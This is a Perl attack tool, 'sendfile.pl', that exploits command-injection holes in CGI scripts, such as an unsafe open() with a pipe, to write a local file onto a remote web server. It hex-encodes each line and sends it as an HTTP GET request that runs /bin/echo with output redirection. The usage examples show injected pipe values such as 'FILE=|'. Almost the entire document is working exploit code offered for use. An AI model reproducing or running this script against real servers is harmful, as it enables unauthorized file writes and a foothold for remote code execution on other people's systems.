#!/usr/bin/perl

# sendfile.pl(4): Vade79[v9@fakehalo.org] -> www.fakehalo.org. (!3066b)
# sendfile.pl(4): Http remote write with use of cgi-bin script bugs. (revision4)
#
# This program is to send data, line by line, to a server using echo.  This
# of course requires a common open(); bug or what not in a script(cgi-bin) 
# that the server uses, that allows you to execute programs. 
#
# Note: make sure if you do this, you do it right.  The httpd log file won't be
# pretty. :)

$dport="80";		# default port to use, without input.
$cmd="/bin/echo";	# this really shouldnt be changed, unless invalid path.
$bin_prefix="%";	# this is the prefix for each bin set. (\x in some cases)
$version="HTTP/1.0";	# version for browser to request.

use Socket;
sub out{print "*** @_\n";}
sub outs{print STDERR "@_";}
sub outq{out("@_ (exit call)");exit(0);}
sub outsq{outs("halted!");print "\n*** @_ (exit call)\n";exit(0);}
sub loop{
 my($file,$line,$sendline,$exit,$i);$file=shift;$i=0;
 outs("*** starting the sendfile process. (.=line sent): ");
 while(!$exit){
  $line=fread("$file:$i");
  if(substr($line,0,1)==1){$line=substr($line,1,length($line));$exit=1;}
  if(!$i){$sendline=$cmd.bin(" ").bin("\'").$line.bin("\'").">$remote";}
  else{$sendline=$cmd.bin(" ").bin("\'").$line.bin("\'").">>$remote";}
  http_connect($sendline);
  if($exit){outs("done!\n");out("finished, sent",($i+1),"lines. [$sent sent, $recv received]");}
  $i++;
 }
}
sub http_connect{
 if(!$s){outq("missing parameter(s): \"http_connect <server> [port]\"");}
 if($p<1){$p=$dport;if(!$p){$p=80;}}
 my($ia,$pa,$proto,$buf,$read,$line);
 $line="GET $header".(shift)."$footer $version";
 $ia=inet_aton($s);$pa=sockaddr_in($p,$ia);
 $proto=getprotobyname('tcp');$buf=select SOCK;$|=1;select $buf;
 socket(SOCK,PF_INET,SOCK_STREAM,$proto)||outsq("error creating socket: $s($p) -> $!");
 connect(SOCK,$pa)||outsq("error connecting to: $s($p) -> $!");
 print SOCK "$line\n\n";$recv+=length("$line\n\n");
 while(defined($read=<SOCK>)){$sent+=length($read);}outs(".");
}
sub fread{
 my($file,$num)=split(/:/,shift);
 open(READ,$file);my @lines=<READ>;close(READ);
 if(!$lines[$num+1]){return "1".make_string($lines[$num]);}
 return make_string($lines[$num]);
}
sub bin{
 my($bin1,$bin2);$bin2=ord(substr(shift,0,1));
 while($bin2>15){$bin2=$bin2-16;$bin1++;}
 if($bin1>9){$bin1=chr($bin1+55);}
 if($bin2>0){if($bin2>9){$bin2=chr($bin2+55);}}
 if(!$bin1){$bin1=0;}
 return $bin_prefix.$bin1.$bin2;
}
sub make_string{
 my($line,$i,$ret);
 $line=shift;chomp($line);$i=0;
 while($i<length($line)){$ret=$ret.bin(substr($line,$i,1));$i++;}
 return $ret;
}
if(!$ARGV[3]){
 out("syntax  : <server[:port]> <local file> <remote file> <path1> [path2]");
 out("example1: www.web.com:80 file.c /tmp/abc.c \'/cgi-bin/script.pl?&FILE=|\'");
 out("example2: www.server.com a.txt /tmp/blah \'/cgi-bin/script.pl?&FILE=\' \'|\'");
 exit(0);
}
($s,$p)=split(/:/,$ARGV[0]);
$local=$ARGV[1];if(!-f$local){out("no such file: $local. (aborted)");exit(0);}
$remote=$ARGV[2];$header=$ARGV[3];$footer=$ARGV[4];
loop($local);exit(0);
